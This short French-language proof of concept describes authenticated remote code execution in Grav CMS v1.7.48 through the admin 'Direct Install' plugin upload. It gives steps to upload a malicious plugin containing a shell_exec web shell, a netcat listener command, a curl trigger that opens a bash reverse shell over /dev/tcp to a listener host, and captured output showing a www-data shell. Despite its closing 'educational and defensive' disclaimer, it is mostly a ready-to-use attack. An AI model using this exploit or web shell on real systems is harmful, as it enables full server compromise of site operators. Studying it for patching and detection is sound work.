
Exploit d'exécution de code à distance authentifié pour Grav CMS v1.7.48 via le téléchargement d'un plugin malveillant dans la fonctionnalité d'installation directe, avec preuve de concept et déclencheur de shell inversé.
Grav CMS v1.7.48 avec le Plugin Admin v1.10.48 est vulnérable à une exécution de code à distance (RCE) via la fonctionnalité de téléchargement de plugin « Direct Install », permettant aux administrateurs authentifiés d'exécuter du code PHP arbitraire sur le serveur.
/admin/tools/direct-install (Panneau d'administration > Outils > Installation directe)Préparer un écouteur :
nc -lvnp 4444
Se connecter au panneau d'administration Grav en tant qu'administrateur.
Aller dans Outils > Installation directe
Télécharger un ZIP de plugin malveillant (evilplugin.zip) structuré comme suit :
evilplugin/
├── evilplugin.php ← contient : shell_exec($_GET['cmd'])
└── blueprints.yaml ← blueprint minimal pour passer la validation
Déclencher le reverse shell :
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
Reverse shell reçu :
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installUniquement à des fins éducatives et défensives.